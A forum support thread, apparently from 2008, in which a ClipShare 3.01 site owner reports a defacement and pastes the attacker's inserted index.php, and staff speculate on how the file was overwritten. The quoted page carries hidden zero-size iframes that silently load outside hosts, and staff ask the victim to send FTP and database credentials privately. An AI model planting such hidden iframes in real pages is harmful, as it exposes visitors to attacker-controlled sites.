I have been hacked

cmlhome · 05-25-2008, 11:59 PM

I have been hacked. clipshare 3.01 page redirected plus admin.
Can anybody help? www.armyuself.com. If I reinstall the script I am still at risk, how can I prevent this?

symtab · 05-26-2008, 09:59 AM

Hi,

PM me FTP and mysql access. I will check and i probably find out how
the script was hacked (are you running any other sites on the server?).

tabouda · 05-26-2008, 02:31 PM

Please let us know so we can make sure that our sites are secure.

cmlhome · 05-26-2008, 04:54 PM

This is the index.php file that has been inserted.
<html>

<head>
<meta http-equiv="Content-Language" content="tr">
<meta name="GENERATOR" content="Microsoft FrontPage 6.0">
<meta name="ProgId" content="FrontPage.Editor.Document">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
<title>iskorpitx(TURKISH HACKER)</title>
</head>
<body bgcolor="#000000" text="#808080">
<p align="center">
<body bgcolor="#000000" text="#808080">
<img src="http://www.mavi1.org/forum/atam.gif"></p>
<p align="center">
 </p>
<p align="center"><font size="6">HACKED BY iSKORPiTX</font></p>
<p align="center"><font size="4">(TURKISH HACKER)</font></p>
<p align="center"><b>iskorpitx hacking&security cd si hazýr mavi1.org ve forumda
gerekli açýklamalar var acele edin tren kalkýyor</b></p>
<p align="center"><b>DÜNYA MARKASI TAKLÝT EDÝLEMEZ! HACKERLER VURUR LAMERLER
ÝNLER!!</b></p>
<p align="center"><b>iskorpitx hacking&security cd sini hazýrladý</b></p>
<p align="center"><font size="5">iscorpitx</font><font size="5">, marque du
monde, présente ses salutations à tout le monde.</font>
<iframe src="http://www.mavi1.org" frameborder="0" width="0" height="0"></iframe>
<iframe src="http://www.mavi1.org/forum" frameborder="0" width="0" height="0"></iframe>
<iframe src="http://www.siyamiozkan.com.tr" frameborder="0" width="0" height="0"></iframe>
<iframe src="http://christophersaban.com/client/" frameborder="0" width="0" height="0"></iframe>

symtab · 05-26-2008, 11:10 PM

Hi,

This means he was able to overwrite your index.php file, which means
the attacker had user-level privileges, or at least apache privileges (depending
on your configuration). Do you have register globals enabled? Also
do you run any other script on the server? I never saw this before with
clipshare, i saw sql injections and xss injections (also via sql), but never
a direct file modification.

05-25-2008, 11:59 PM	#1
cmlhome Member \|Forum Newbie\| Join Date: Apr 2008 Posts: 9	I have been hacked I have been hacked. clipshare 3.01 page redirected plus admin. Can anybody help? www.armyuself.com. If I reinstall the script I am still at risk, how can I prevent this?

05-26-2008, 04:54 PM	#4
cmlhome Member \|Forum Newbie\| Join Date: Apr 2008 Posts: 9	Re: I have been hacked This is the index.php file that has been inserted. <html> <head> <meta http-equiv="Content-Language" content="tr"> <meta name="GENERATOR" content="Microsoft FrontPage 6.0"> <meta name="ProgId" content="FrontPage.Editor.Document"> <meta http-equiv="Content-Type" content="text/html; charset=windows-1254"> <title>iskorpitx(TURKISH HACKER)</title> </head> <body bgcolor="#000000" text="#808080"> <p align="center"> <body bgcolor="#000000" text="#808080"> <img src="http://www.mavi1.org/forum/atam.gif"></p> <p align="center">  </p> <p align="center"><font size="6">HACKED BY iSKORPiTX</font></p> <p align="center"><font size="4">(TURKISH HACKER)</font></p> <p align="center"><b>iskorpitx hacking&security cd si hazýr mavi1.org ve forumda gerekli açýklamalar var acele edin tren kalkýyor</b></p> <p align="center"><b>DÜNYA MARKASI TAKLÝT EDÝLEMEZ! HACKERLER VURUR LAMERLER ÝNLER!!</b></p> <p align="center"><b>iskorpitx hacking&security cd sini hazýrladý</b></p> <p align="center"><font size="5">iscorpitx</font><font size="5">, marque du monde, présente ses salutations à tout le monde.</font> <iframe src="http://www.mavi1.org" frameborder="0" width="0" height="0"></iframe> <iframe src="http://www.mavi1.org/forum" frameborder="0" width="0" height="0"></iframe> <iframe src="http://www.siyamiozkan.com.tr" frameborder="0" width="0" height="0"></iframe> <iframe src="http://christophersaban.com/client/" frameborder="0" width="0" height="0"></iframe>

Thread Tools
Show Printable Version Email this Page
Display Modes
Linear Mode Switch to Hybrid Mode Switch to Threaded Mode

Similar Threads
Thread	Thread Starter	Forum	Replies	Last Post
Hacked!!! Please Help	Butters	General Discussion	2	01-04-2008 01:06 AM

05-26-2008, 09:59 AM	#2
symtab ClipShare Staff \|Forum Guru\| Join Date: Jan 2007 Posts: 1,945	Hi, PM me FTP and mysql access. I will check and i probably find out how the script was hacked (are you running any other sites on the server?).

05-26-2008, 02:31 PM	#3
tabouda Member \|Forum Regular\| Join Date: May 2008 Posts: 134	Please let us know so we can make sure that our sites are secure.

05-26-2008, 11:10 PM	#5
symtab ClipShare Staff \|Forum Guru\| Join Date: Jan 2007 Posts: 1,945	Hi, This means he was able to overwrite your index.php file, which means the attacker had user-level privileges, or at least apache privileges (depending on your configuration). Do you have register globals enabled? Also do you run any other script on the server? I never saw this before with clipshare, i saw sql injections and xss injections (also via sql), but never a direct file modification.

Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)